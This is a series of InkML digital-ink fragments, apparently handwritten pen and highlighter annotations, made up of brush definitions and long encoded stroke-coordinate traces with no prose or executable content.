0 0,-1 0 0,-4 0 0,3-7 0,17 1 0,-1-8 0,-3 3 0,-14 5 0,0-4 0,1 4 0,-1 0 0,-7 1 0,-2 5 0,0-5 0,10-1 0,1 0 0,-1-3 0,-10 8 0,0-3 0,3 0 0,14-2 0,-5 1 0,4 0 0,-7 5 0,0 0 0,-10 0 0,20 0 0,-18 0 0,21-5 0,-20 4 0,5-4 0,8-2 0,-3 6 0,-1-6 0,20-1 0,-33 6 0,35-6 0,-31 8 0,7 0 0,12 0 0,17 0 0,28 8 0,4 2 0,-4 1 0,-16 4 0,-12-6 0,-1 6 0,-12-6 0,-3-3 0,-13-1 0,-7-4 0,-2 4 0,1-9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6:17.721"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 611 24575,'8'-16'0,"6"-8"0,-5 10 0,24-31 0,-11 8 0,13-14 0,-16 18 0,4-8 0,-12 24 0,6-18 0,-9 18 0,-3 4 0,2 2 0,-6 2 0,3 1 0,-4 0 0,0 0 0,3 3 0,-2-2 0,3 2 0,-4-3 0,3 0 0,-2-1 0,6 1 0,-6 0 0,6-4 0,-6 3 0,7-3 0,-4 4 0,1-1 0,2 1 0,-6 0 0,2 0 0,-3-1 0,4 5 0,-3-4 0,2 0 0,1-1 0,-3-7 0,6 7 0,-6-3 0,3 4 0,-4 4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26:52.491"/>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1 281 16383,'85'10'0,"-22"-3"0,-1 0 0,22 9 0,-26-10 0,3 0 0,9 4 0,1-2 0,-10-6 0,3-1 0,4 5 0,6 2 0,-4-2 0,3-4 0,2-1 0,4 2 0,6 1 0,-2-1 0,17-2 0,-1-2 0,-23 1 0,2 0 0,6 0 0,-1 0 0,7 0 0,0 0 0,-5 0 0,4 1 0,-5-1 0,3-1 0,-8 0 0,2-2 0,0 0 0,-6 1 0,1 1 0,-4 1 0,-4-2 0,14-8 0,-1 1 0,13 7 0,-2 2 0,-22-5 0,2 0 0,-4 5 0,5 1 0,-6-2 0,0-3 0,-2-1 0,22 4 0,-4 0 0,-3-8 0,-26 4 0,1 1 0,-1 4 0,-1-2 0,34-12 0,-24 9 0,-4 1 0,-7-3 0,35-9 0,-35 14 0,19-6 0,-9 0 0,3 6 0,9-6 0,0 8 0,4 0 0,-14 0 0,20 0 0,7 0 0,-7 0 0,-27 0 0,-2 0 0,10 0 0,-4 0 0,6-7 0,-17 5 0,7-4 0,1-1 0,-32 5 0,29-5 0,-29 7 0,58 0 0,-29 0 0,44 0 0,-34 0 0,22 0 0,3 0 0,-33 0 0,5 0 0,31 0 0,2 0 0,-26 0 0,-3 0 0,7 0 0,-3 0 0,27 0 0,-4 0 0,-39 3 0,1 2 0,10 0 0,-1 1 0,-10-1 0,-2 0 0,41 4 0,6-9 0,-34 0 0,35 0 0,-7 0 0,0 0 0,7 0 0,-22 0 0,1-5 0,-17 3 0,-14-2 0,-15-1 0,0 3 0,0-8 0,0 9 0,0-9 0,13 9 0,3-4 0,12 5 0,-19 0 0,28 0 0,-25 0 0,9 0 0,3 0 0,-13 0 0,18 0 0,1 0 0,-1 0 0,12 0 0,-22 0 0,20 0 0,-23 0 0,-1 0 0,11 0 0,4 0 0,3 0 0,23 8 0,-25 1 0,23 1 0,-22-3 0,10-1 0,-14-4 0,26 5 0,-6-7 0,-4 0 0,-6 0 0,-34 0 0,8 0 0,-12 0 0,0 5 0,1-4 0,-1 4 0,1-5 0,-1 0 0,0 0 0,13 0 0,-10 0 0,10 0 0,-20 0 0,5 0 0,-5 0 0,7 0 0,0 5 0,-11-4 0,9 4 0,3-5 0,3 0 0,8 0 0,-12 0 0,13 7 0,3 1 0,-7 1 0,2-2 0,33 2 0,-38-7 0,18 7 0,6 0 0,23 3 0,-9-1 0,-21-5 0,-4-3 0,-7-3 0,17 0 0,-24 0 0,6 0 0,-25 0 0,24 0 0,-28 0 0,16 0 0,-5 0 0,22 0 0,-11 0 0,10 0 0,-1-7 0,5 6 0,-9-6 0,1 3 0,-25 3 0,11-3 0,5 4 0,-5 0 0,10 0 0,-20 0 0,12 0 0,3 0 0,-10 0 0,39 0 0,-34 0 0,42 0 0,-35 0 0,10 0 0,0 0 0,3 0 0,-11 0 0,-2 0 0,-16 0 0,3 0 0,14 0 0,-17-4 0,12 3 0,-11-10 0,2 9 0,10-6 0,-14 8 0,34 0 0,-22 0 0,35 0 0,-17 0 0,12 0 0,1-7 0,0 5 0,-1-12 0,1 13 0,12-14 0,-9 6 0,9-8 0,-25 9 0,17-1 0,5 2 0,22 5 0,-9-6 0,4-2 0,-14 4 0,-4 0 0,-14 1 0,0-1 0,20-4 0,3 0 0,0 5 0,2-3 0,3-7 0,2-1 0,9 3 0,0 1 0,1-5 0,-6 2 0,-31 8 0,-2 2 0,14-5 0,-4 2 0,5 6 0,-19-6 0,-9 8 0,-35 0 0,15 0 0,7 0 0,-6 0 0,6 0 0,-6 3 0,-1 2 0,10 4 0,-12-5 0,3 0 0,1-4 0,1 0 0,6 0 0,-10 4 0,30 4 0,-22-3 0,35 2 0,-41-7 0,44 8 0,-52-6 0,32 6 0,-21-8 0,-7 0 0,19 0 0,-21 0 0,6 0 0,15-5 0,-21 4 0,20-4 0,-14 5 0,-9 0 0,23 0 0,-22 0 0,19-5 0,-14 4 0,4-4 0,3 5 0,-6 0 0,6 0 0,-3 0 0,11 0 0,-5-5 0,9 4 0,-15-4 0,5 5 0,-8 0 0,2 0 0,4-4 0,-2 3 0,0-3 0,1 4 0,-5 0 0,6-8 0,1 2 0,-7-3 0,8 4 0,-12 5 0,11 0 0,-4 0 0,0 0 0,-1 0 0,1 0 0,0-4 0,0 3 0,0-3 0,0 0 0,-1-1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30:48.209"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'49'78'0,"0"-1"0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,6 7 0,3 3 0,-1-1 0,-2-3 0,-5-6 0,-7-9 0,-9-12 0,0 11 0,-11-17 0,1 1 0,-1 15 0,-11-36 0,0 3 0,-1-10 0,-1-8 0,0 9 0,0-6 0,0-1 0,-1-3 0,1-2 0,-1 1 0,1-4 0,0 7 0,-1-2 0,-3-1 0,3 0 0,-8-5 0,8-3 0,-7-1 0,3-4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30:49.435"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">128 0 24575,'-4'18'0,"0"3"0,-5-8 0,-1 11 0,-3-5 0,1 13 0,-2-6 0,3 7 0,-2 12 0,3-15 0,2 14 0,-3 9 0,9-20 0,-5 19 0,7-39 0,0 0 0,0-13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30:50.424"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'43'4'0,"-2"2"0,17 9 0,-19-4 0,45 6 0,-32-3 0,23 3 0,-1-1 0,-22-7 0,0 3 0,-32-11 0,-11 3 0,-6-4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45:51.865"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.5" units="cm"/>
      <inkml:brushProperty name="height" value="1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFFD78"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 78 16383,'70'5'0,"-14"-1"0,-40-4 0,4 0 0,14 0 0,14 0 0,8 0 0,6 0 0,12 0 0,4 0 0,-13 0 0,6 0 0,5 0 0,-8-7 0,21 5 0,-40-4 0,2 5 0,-1 2 0,-3-1 0,6-3 0,-4 1 0,-23 0 0,19-3 0,-30 2 0,24-3 0,-18 1 0,33-5 0,-32 8 0,24-7 0,-27 7 0,24-3 0,-21 1 0,22 4 0,-25-4 0,6 0 0,3 3 0,14-3 0,-2 4 0,8 0 0,-15 0 0,-7 4 0,5-3 0,18 7 0,-11-6 0,45 14 0,-43-8 0,46 13 0,-34-14 0,36 5 0,4-2 0,-24-6 0,3 3 0,15 2 0,-15-1 0,0 2 0,-7-5 0,2 1 0,21 10 0,-35-14 0,19 6 0,-22-8 0,26 7 0,-11-5 0,11 6 0,-26-8 0,9 7 0,-22-5 0,3 5 0,-8-7 0,-5 0 0,22 0 0,-18 0 0,16 0 0,-20 0 0,7 0 0,-7 0 0,5-5 0,-5 4 0,7-4 0,26 5 0,-27 0 0,25 0 0,-31 0 0,20 0 0,-10 0 0,9 0 0,14 0 0,-7 0 0,-1 0 0,-8 0 0,-21 0 0,24-7 0,-10 5 0,10-10 0,-13 11 0,-7-4 0,18 5 0,-15 0 0,17 0 0,-1 0 0,4 0 0,13 0 0,-13 0 0,24 0 0,-44-4 0,21 3 0,-40-3 0,14-3 0,7 1 0,5-3 0,-2 5 0,-3 4 0,3 0 0,-10 0 0,22 0 0,-22 0 0,10 0 0,-3 0 0,52 0 0,-23 0 0,-8 3 0,1 1 0,9-2 0,12 5 0,-22-7 0,40 0 0,-51 0 0,25 0 0,-33 0 0,0 0 0,0 0 0,48 6 0,-36-4 0,9 2 0,0-1 0,-14-3 0,13-4 0,-21 3 0,2-3 0,1 4 0,0 0 0,-4 0 0,-12 0 0,12 0 0,11 0 0,-12-4 0,17-1 0,-31 1 0,8 0 0,15 4 0,-16 0 0,16 4 0,-15-3 0,-9 2 0,22-3 0,-17 0 0,9 0 0,3 0 0,-11 0 0,11 0 0,-7 0 0,-6 0 0,13 0 0,-5 0 0,0 4 0,5-3 0,-13 7 0,13-7 0,2 6 0,2-1 0,5 4 0,-8 1 0,-7-1 0,-2-4 0,8 6 0,-15-10 0,18 7 0,-17-9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52:59.686"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'9'4'0,"3"1"0,-8 3 0,5 1 0,-4 3 0,2 2 0,2-1 0,1 3 0,8 5 0,-4-6 0,22 33 0,-13-22 0,24 30 0,-4-7 0,17 2 0,-3 4 0,-12-18 0,9 9 0,-6-8 0,24 16 0,-4-10 0,3 7-1393,4-15 1393,7 8 0,-38-22 0,2 0-300,14 1 0,-2-1 300,14 12 0,-17-13 0,1-2 0,9 6 0,-1 0 0,-16-7 0,1-1 0,19 8-566,-6-5 0,4 0 566,-13 0 0,3-1 0,34 3 0,3 0 0,-21-1 0,1-1-715,-5-7 0,5-2 0,-2 1 715,13 9 0,-2-2 0,7-6 0,-1-1 0,-13 3 0,-2 1 0,-1-1 0,0 0 0,3-5 0,-1 1 0,-10 4 0,-2-1 0,4-5 0,-2 0 1110,26 9-1110,-32-8 0,12-2 530,-28-2-530,6-4 1098,-9 5-1098,-14-7 2532,-8-4-2532,0 3 0,1-3 0,-1 4 0,7-5 0,-5 4 0,40-4 0,-14 5 0,12 0 0,12 8 0,-47-6 0,34 6 0,-45-8 0,8 0 0,-14-4 0,-1-1 0,-4-7 0,0-2 0,-4 1 0,-2-11 0,-7 9 0,-1-10 0,-4 8 0,1-1 0,3 1 0,2 3 0,3 2 0,0 7 0,0-7 0,1 10 0,3-9 0,-3 6 0,3-4 0,-4 4 0,5-3 0,-4 7 0,7-6 0,-7 6 0,3-7 0,-4 7 0,5-7 0,-4 7 0,3-7 0,-4 4 0,-3-5 0,2-4 0,-7 3 0,8-6 0,-8 6 0,8-2 0,-4 3 0,8 0 0,1 0 0,4 1 0,-4 3 0,3-3 0,-3 3 0,1 0 0,2-2 0,-7 2 0,7-4 0,-3 0 0,0 4 0,3-2 0,-3 6 0,4-3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8:53:01.113"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1149 1 24575,'-31'0'0,"-17"7"0,6 1 0,-20 15 0,-25-4 0,38 0 0,-3-9 0,-3-1 0,-19 14-300,16-12 0,-3 0 300,7 7 0,2 0 148,-38 8-148,16 1 0,24-7 0,12-4 0,2-1 0,16-1 0,-4-1 452,11-4-452,4-4 0,1-1 0,3-1 0,1 2 0,0 0 0,-1 3 0,-4-4 0,1 5 0,-1-1 0,0-3 0,4 3 0,1-7 0,4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3:29:56.091"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 141 24575,'16'0'0,"-1"3"0,-7-7 0,3 4 0,-2 0 0,2 0 0,-3-3 0,-1 2 0,1-2 0,0 3 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,3 0 0,1-4 0,4 3 0,0-2 0,-1 3 0,1 0 0,0 3 0,-1-2 0,7 7 0,-4-7 0,10 8 0,-4-4 0,5 1 0,-5-2 0,-2-4 0,-10 0 0,3 4 0,-6-3 0,2 5 0,0-5 0,1 6 0,17-2 0,-10 0 0,10-1 0,-16-4 0,1 0 0,-5 0 0,2 0 0,-3 0 0,3 0 0,-2 0 0,6 0 0,-3 0 0,4 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,7 0 0,-4 0 0,10 0 0,-11 0 0,2 0 0,2 0 0,-1 0 0,10 0 0,0 0 0,-1 0 0,1 5 0,-6-4 0,16 3 0,-14-4 0,9 0 0,-6 0 0,-6 0 0,19 0 0,-10 0 0,21 7 0,-8-6 0,10 12 0,-10-12 0,8 5 0,-9-6 0,25 5 0,-10-4 0,10 3 0,-25 1 0,9 2 0,-8 5 0,-1 0 0,9 2 0,2-1 0,-7-1 0,16-3 0,-20 1 0,-6-8 0,14 4 0,-14 0 0,17-4 0,3 1 0,-1 0 0,-4-3 0,3 0 0,-1 0 0,-17 0 0,0 0 0,-5 0 0,-21 3 0,0-2 0,-5 3 0,1-4 0,0 0 0,0 0 0,3 0 0,1 0 0,4 0 0,6 0 0,1 0 0,-3 0 0,2 0 0,-4 0 0,-4 0 0,3 0 0,1 0 0,-4 0 0,14 0 0,-4 0 0,-1 0 0,-8-4 0,-8 0 0,-7-4 0,-3 3 0,-15-14 0,-3 6 0,-28-27 0,-1-3 0,-15-8 0,15 7 0,10 13 0,18 13 0,10 6 0,1 4 0,6 1 0,-2 6 0,3-6 0,-1 3 0,-5-4 0,1 0 0,-3 0 0,-3 0 0,6 0 0,-3 4 0,8 0 0,1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3:29:57.229"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">634 1 24575,'-31'8'0,"-13"6"0,-12 7 0,-16 13 0,13-5 0,-17 9 0,17-4 0,0-5 0,6 4 0,30-18 0,1-2 0,9-9 0,5 3 0,1-6 0,3 2 0,-4 1 0,0-3 0,4 6 0,-3-3 0,2 4 0,-3-4 0,4 3 0,0-6 0,4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3:30:05.088"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 467 24575,'23'-16'0,"-9"-4"0,-1 19 0,8-6 0,3 7 0,5 0 0,10 0 0,-2 0 0,40 0 0,-16 0 0,15 0 0,-20 0 0,-1 0 0,-11 0 0,-3 0 0,-12 0 0,-7 0 0,-1 0 0,-7 0 0,1 0 0,-1 0 0,7 0 0,13 0 0,10 0 0,12 0 0,-1 0 0,43 0 0,11 0 0,42 0 0,-21 0 0,-6 0 0,-53 7 0,2-6 0,-41 12 0,9-11 0,-18 4 0,11-6 0,-17 0 0,17 0 0,0 0 0,10 0 0,11 0 0,1 0 0,63 0 0,-59 0 0,120 15 0,-14 5-297,-45 5 0,11 2 297,25-7 0,7 0-1115,8 8 1,1-2 1114,-17-14 0,-2-4 0,5 1 0,-6 0-460,-38-1 0,-4-2 460,2-4 0,-6 0 0,50 13 0,-11-15 0,3 11 0,-56-8 500,18 8-500,-76-11 2176,-15 0-2176,-5 0 1067,-1 0-1067,1 0 0,6-6 0,1 4 0,7-4 0,0 6 0,0-7 0,0-1 0,12 0 0,-9-5 0,21 3 0,-21 2 0,20-1 0,-27 3 0,8 4 0,-18-4 0,-1 6 0,-6-7 0,-8-8 0,-15-1 0,-29-33 0,9 21 0,-27-18 0,8-4 0,-26 10 0,-33-41 0,25 40 0,2-15 0,51 45 0,8-9 0,17 12 0,-10-6 0,19-1 0,-12 7 0,11-5 0,-11 11 0,5-11 0,-13 5 0,-2-7 0,-6 1 0,6-1 0,-5 0 0,12 1 0,-5-1 0,6 7 0,7 8 0,2 14 0,6 2 0,0-1 0,0-9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6:28.207"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1631 0 24575,'-5'9'0,"-2"-5"0,6 3 0,-7-2 0,4 3 0,-4 0 0,-1 0 0,5 0 0,-4-3 0,4 2 0,-4-3 0,-1 4 0,1 1 0,0-1 0,0 0 0,-1-4 0,1 4 0,-4 0 0,3 1 0,-7 2 0,4-2 0,-1 2 0,-3-2 0,3 3 0,1 0 0,-11 3 0,7 8 0,-4-7 0,-10 18 0,13-11 0,-15 13 0,13-15 0,-1 8 0,7-15 0,-5 9 0,9-6 0,-16 13 0,8-4 0,-11 13 0,12-15 0,-7 18 0,12-15 0,-13 16 0,10-18 0,-1-2 0,-3 0 0,5-5 0,-7 11 0,-9 10 0,8-11 0,-9 15 0,11-18 0,0-1 0,4-1 0,-2 0 0,2 2 0,-6 6 0,4 0 0,-6 12 0,10-9 0,-10 10 0,11-13 0,-2-7 0,4 6 0,5-12 0,-3 5 0,-3 0 0,1 1 0,-14 19 0,12-8 0,-16 22 0,16-29 0,-8 15 0,12-25 0,-1 1 0,0-3 0,5-7 0,-4 3 0,7-4 0,-6 3 0,6-2 0,-6 7 0,-1 0 0,2-2 0,-5 1 0,10-7 0,-6 0 0,2 4 0,1-3 0,-7 3 0,5 0 0,-6 0 0,-2 11 0,5-5 0,-9 9 0,9-10 0,1-1 0,1 0 0,2-7 0,0 3 0,-2-4 0,6 0 0,-3 0 0,4 0 0,-3 4 0,2-3 0,-3 3 0,1-4 0,-2 0 0,0 0 0,-3 10 0,2 3 0,-9 10 0,8 0 0,-15 13 0,12 2 0,-11 12 0,13-19 0,-2-7 0,9-21 0,-3-2 0,4-1 0,0 0 0,0 0 0,-4 0 0,3 0 0,-2 0 0,-1 0 0,3 0 0,-2-7 0,-1-9 0,-1-6 0,-9-13 0,5 9 0,-5-5 0,6 7 0,-6-7 0,-2-2 0,0-6 0,2 6 0,5 2 0,0 10 0,5-3 0,0 7 0,1 1 0,2 1 0,-3 2 0,4-3 0,-4 0 0,3-1 0,-6 1 0,6 0 0,-3 0 0,4-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-3-2 0,2-2 0,-3-4 0,4 1 0,0 3 0,0-3 0,0 7 0,0-3 0,-3 8 0,2-4 0,-3 7 0,4-2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3:30:06.748"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">675 1 24575,'-54'24'0,"-23"14"0,36-10 0,-9 3 0,-36 38 0,48-25 0,-32 19 0,46-30 0,9-19 0,0 1 0,7-1 0,-5-6 0,5 5 0,0-5 0,-5 7 0,5-1 0,-7 7 0,1-5 0,5 5 0,-4-7 0,5 0 0,0 1 0,2-1 0,-1 1 0,5-1 0,-11 0 0,5 14 0,0-11 0,-5 17 0,5-18 0,0 5 0,1-6 0,7-7 0,0-2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0:06:04.423"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 136 24575,'27'-5'0,"-2"1"0,-8 0 0,7 3 0,2-3 0,1 4 0,18-5 0,-15-1 0,18 0 0,-15-4 0,4 9 0,-13-4 0,0 1 0,-12 3 0,13-3 0,-5 0 0,13 3 0,-15-3 0,7 4 0,-10 0 0,1 0 0,-8 0 0,24 0 0,-7 0 0,14 0 0,-15 0 0,16 0 0,-17 0 0,16 0 0,-25 0 0,-2 0 0,-3 4 0,3-3 0,2 3 0,3 0 0,7-3 0,17 3 0,-11-4 0,16 0 0,-20 0 0,40 0 0,-32 0 0,24 0 0,-34 0 0,18 0 0,-6 0 0,6 0 0,-18 0 0,5 0 0,-9 3 0,9-2 0,-5 8 0,18-3 0,-12 0 0,31 9 0,-31-13 0,61 15 0,-47-11 0,8-2 0,-1 1 0,-12 4 0,32-8 0,-22 11 0,0-10 0,9 5 0,-21-2 0,-2-4 0,-5 4 0,-15-5 0,24 0 0,-18 4 0,7-4 0,-5 4 0,23 0 0,-7 2 0,10-1 0,-25 0 0,15-5 0,-16 0 0,19-4 0,-23-1 0,24 0 0,-20 1 0,17 4 0,-16 0 0,21 0 0,-14 0 0,13 0 0,-27 0 0,8 0 0,-10 0 0,9 0 0,-10 0 0,40-5 0,-28 4 0,35-4 0,-35 5 0,0-4 0,-2 3 0,-3-2 0,4 3 0,-2 0 0,9 0 0,23 4 0,-22-2 0,28 2 0,-46 0 0,30-3 0,-19 8 0,29-3 0,-20 0 0,46 6 0,-25-4 0,-5-3 0,0-1 0,1 3 0,10-6 0,2-2 0,-2 1 0,-3 0 0,-1 0 0,-10 0 0,38 0 0,-43 0 0,9 0 0,-1 0 0,-18 0 0,28 0 0,-42 0 0,41 0 0,-26-5 0,41 4 0,-39-9 0,37 9 0,-33-9 0,28 3 0,-33-4 0,7 1 0,-9 4 0,-6 3 0,-7-1 0,4 3 0,-9-3 0,21-1 0,-16 0 0,23-1 0,-22-2 0,26 3 0,-26 0 0,11 1 0,-15 4 0,16 0 0,-5 0 0,6 0 0,-2 0 0,1 0 0,-5 0 0,26 0 0,-24 0 0,34 0 0,-27 0 0,13 0 0,-28 0 0,32 0 0,-26 0 0,37 0 0,-30 0 0,14 0 0,-2 0 0,18 0 0,-2 0 0,-6 0 0,-11 0 0,41 0 0,-27 0 0,11 0 0,2 0 0,-2 7 0,-12-6 0,-3 0 0,-11 6 0,53-2 0,-61-4 0,31 4 0,-37-5 0,-4 0 0,-1 0 0,3 0 0,-4 0 0,13 9 0,-3-7 0,-1 6 0,-10-8 0,9 0 0,-12 0 0,26 0 0,-26 0 0,18 0 0,-24 0 0,17 0 0,-17 0 0,18 0 0,-7 0 0,1 0 0,-3 0 0,16 0 0,-10 0 0,11 0 0,-10 0 0,3 0 0,14 0 0,38 0 0,-30 0 0,19 0 0,-42 0 0,-7-4 0,-6 4 0,-3-4 0,-8 0 0,4 3 0,-5-3 0,1 4 0,3 0 0,-2 0 0,6 0 0,-6 0 0,2 0 0,8 0 0,-8 0 0,12 0 0,-14 0 0,2 0 0,0 0 0,17-4 0,-8 3 0,16-3 0,-19 4 0,0 0 0,-2 0 0,9 0 0,-9 0 0,8 0 0,-15 0 0,-1 0 0,5 0 0,-4 0 0,8 0 0,-8 0 0,8 0 0,4 0 0,-6 0 0,9 0 0,-14 0 0,10 0 0,-6 0 0,22 0 0,-8 0 0,13 0 0,-15 0 0,6-4 0,-17 3 0,9-3 0,-14 4 0,6 0 0,-2 0 0,32 0 0,-25 0 0,47 0 0,-50 0 0,28 0 0,-20 0 0,43 0 0,-28 5 0,27-3 0,-35 2 0,1-4 0,-8 0 0,-1 0 0,-7 0 0,7 0 0,1 0 0,8 0 0,-1 0 0,15 5 0,-11-4 0,19 9 0,-32-9 0,14 4 0,-23-5 0,21 0 0,-20 0 0,19 0 0,-20 0 0,6 0 0,2 5 0,35-4 0,-4 4 0,30-5 0,-10 0 0,19 0 0,-12 0 0,-1-4 0,-4 0 0,-17 2 0,6-3 0,-6 2 0,-30 8 0,17-4 0,-20 4 0,14-5 0,-19 0 0,26 0 0,-19 0 0,6 0 0,-10 0 0,12 0 0,-14 0 0,10 0 0,-15 0 0,-4 0 0,4 0 0,1 4 0,-1-3 0,0 3 0,-4-4 0,4 0 0,3 0 0,14 0 0,-6 0 0,4 0 0,-15 4 0,15-3 0,-4-3 0,27-4 0,-18-5 0,15 5 0,-6-6 0,-13 10 0,4-8 0,-4 5 0,-12 0 0,16 1 0,-19 4 0,3 0 0,-7 4 0,17-3 0,-18 3 0,33-4 0,3 0 0,-13 0 0,20 0 0,-18-5 0,-12 3 0,12-3 0,-24 5 0,-1 0 0,4 0 0,34 4 0,-17 2 0,23-1 0,-32 4 0,0-8 0,1 3 0,15-4 0,-6 0 0,14 0 0,-21 0 0,0 0 0,-12 0 0,5 0 0,-2 0 0,6 3 0,-7-2 0,21 13 0,-10-12 0,20 12 0,-23-13 0,3 3 0,-11-4 0,3 0 0,4 0 0,16 0 0,-11 0 0,13 0 0,-24 0 0,-2 0 0,-5 0 0,9 0 0,-10 0 0,13 0 0,-11 0 0,5 0 0,-1 0 0,30 0 0,-23 0 0,45 0 0,-46 0 0,16 0 0,-22 0 0,23 0 0,-21 0 0,19 0 0,-24 0 0,-1 0 0,4 0 0,11-8 0,-6 6 0,25-10 0,-30 11 0,14-3 0,-17 4 0,32 0 0,-25 0 0,25 0 0,-37 0 0,23 4 0,-15-3 0,50 3 0,-21-4 0,30 0 0,-34 0 0,44 0 0,-56 0 0,36 0 0,-48 0 0,-1 0 0,0 4 0,0-3 0,-3 3 0,-2-1 0,-3-2 0,-1 3 0,1-4 0,0 0 0,-1 0 0,1 0 0,7 0 0,-1 0 0,6 0 0,-4 0 0,8-4 0,-6 3 0,14-2 0,-14 3 0,6 0 0,-11 0 0,-2 0 0,-3 0 0,19 3 0,-11-2 0,23 3 0,-14-4 0,1 0 0,-6 0 0,3 0 0,-9 0 0,10 0 0,-11 0 0,9 0 0,-8 0 0,71-7 0,-33 5 0,45-4 0,-61 6 0,1 0 0,-23 0 0,25 0 0,-23 0 0,15 0 0,-23 0 0,8 0 0,-4 0 0,16 0 0,-2 0 0,26 0 0,-17 0 0,12 4 0,-22-2 0,6 3 0,-17-5 0,9 0 0,-14 3 0,2-2 0,1 3 0,0 0 0,4-3 0,22 8 0,-9-8 0,18 4 0,-15-5 0,60 0 0,-7 0 0,7 0 0,-12 0 0,-43-7 0,11 5 0,9-5 0,-9 7 0,14 0 0,-20 0 0,3 0 0,-20 0 0,0 0 0,-6 0 0,26 5 0,-25-4 0,40 9 0,-33-9 0,2 4 0,-7-5 0,2 0 0,-4 0 0,3 0 0,-7 0 0,3 0 0,-1 0 0,31 5 0,-26-4 0,40 9 0,-41-9 0,23 9 0,-31-9 0,16 4 0,-16-5 0,32 0 0,-17 0 0,30 0 0,-24 0 0,10 0 0,-13 0 0,13 0 0,-10-5 0,10 4 0,-13-4 0,0 0 0,-11 4 0,1-8 0,-13 8 0,2-3 0,1 4 0,-4 0 0,8 0 0,-4-4 0,4 3 0,1-3 0,21 4 0,-16 0 0,24-5 0,-28 4 0,27-4 0,-23 5 0,38 0 0,-42 0 0,27 0 0,-24 0 0,4 0 0,18 0 0,20 5 0,3-4 0,19 9 0,-36-9 0,10 4 0,2-5 0,-11-4 0,3 0 0,30 2 0,-28-4 0,-3 0 0,-2 5 0,-4-3 0,-27 0 0,19-2 0,-24-3 0,27 4 0,-31 1 0,5 4 0,-7 0 0,3-4 0,-2 3 0,2-7 0,1 3 0,0 0 0,11-4 0,32-2 0,-16-1 0,50-11 0,-50 15 0,46-20 0,-22 16 0,-5-2 0,2-2 0,24-2 0,-5 5 0,-48 6 0,-23 7 0,-1 0 0,18 20 0,-18-14 0,13 14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0:59:58.039"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
